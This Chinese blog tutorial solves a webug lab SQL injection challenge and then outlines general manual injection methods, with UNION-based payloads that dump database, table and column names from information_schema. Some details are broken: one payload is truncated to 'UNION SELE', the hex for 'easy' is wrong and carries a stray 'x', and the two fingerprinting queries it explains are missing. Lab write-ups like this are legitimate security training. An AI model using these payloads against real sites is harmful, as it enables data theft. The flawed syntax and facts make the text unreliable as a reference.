SQL注入攻击及思路延伸，webug靶场实战

（图片源于网络，侵删）

PS:假期前分享的webug靶场大家安装好了吧，我们来就着这些漏洞来一点点延伸学习吧。

1

普通的get注入

下面我们开始解题。先过一遍流程，后面继续延伸。第一题，普通的get注入。说是普通的GET注入 那么就在gid这个参数下手。

输入：http://192.168.192.128/pentest/test/sqli/sqltamp.php?gid=1'，单引号报错 得到提示信息，需要闭合单引号来完成。

输入：http://192.168.192.128/pentest/test/sqli/sqltamp.php?gid=1' order by 5 --+，报错

输入：http://192.168.192.128/pentest/test/sqli/sqltamp.php?gid=1' order by 4 --+，正常返回

下面开始爆表，输入：gid=-1' UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+，爆表成功

下面开始爆列，输入：gid=-1' UNION SELECT 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c6167 --+，爆列成功

下面开始查flag值，输入 ：gid=-1' UNION SELE 1,2,3,group_concat(id,0x5e,flag) from flag --+，查询成功。

OK，这道题就算完成啦。你已经可以任意修改商品价格了，想买多少买多少。

2

SQL手工注入思路延伸

下面说一下SQL注入的一般思路，针对不同数据库，语句有所不同，但是思路大致相同

第一步判断网站是否存在注入：

还需要判断数据库类型，在网址后面加上单引号，看报错情况，如果显示Microsoft JET Database错误，则是Access数据库，如果显示ODBC类型，则是MSSQL数据库

如果这两种方法都不成功，就利用两种数据库的差异判断

第一条语句如果返回正常，则说明是MSSQL数据库，这条语句是查询mssql数据库中表sysobject里的数据是否大于0，sysobject表是MSSQL、自带的表，所以这条查询语句正确，返回页面正常，这个表只有MSSQL数据库里才有，所以如果是ACCESS数据库就会报错。

第二条语句同理，msyobjects表是ACCESS数据库独有的，但是注意就算是ACCESS数据库，也会返回错误，因为普通用户没有权限访问，注意如果该语句报错是说没有权限，那就是ACCESS数据库

总结就是，第一条语句返回正确，第二条语句返回错误，则是MSSQL数据库，两条语句都返回错误，而且错误类型不一样，则是ACCESS数据库。

判断数据库还有很多种方法，具体情况再考虑，还有很多不同的方法。具体如下：

查询数据库表的数目：order by

爆字段位：and 1=2 union select 1,2,3.....n

利用内置函数暴数据库信息：version() database() user()

Mysql 5 以上有内置库 information_schema，存储着mysql的所有数据库和表结构信息：

1.and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from

2.information_schema.SCHEMATA limit 0,1

查数据库名：select database()

Union select 1,database(),3,4,5

查到数据库名称 假设为easy。查数据库名为easy下面的表名 ( 注意数据库名称要用 16进制编码 如果easy的十六进制编码为0x66616E6B65) 则查询语句为：

union select 1,table_name,3,4,5 from information_schema.tables where table_schema=0x66616E6B65x

information_schema.tables：存储mysql数据库下面的所有表名信息的表

table_schema： 数据库名

Table_name： 表名

查user表名下的列名信息：

union select 1,column_name,3,4,5 from information_schema.columns where table_name=0x75736572

column_name：列名

information_schema.columns ：存储mysql数据库下面的所有列名信息的表

手工注入还有很多语句，针对不同情况要考虑不同语句，有时候需要大量测试，如果针对可入住地址而且需要大量测试，有很多的工具可以帮忙，比如：sqlmap。

PS：完成撒花！求转发求鼓励！欢迎进群来撩！

安全犀牛

资讯、交流、入群点关注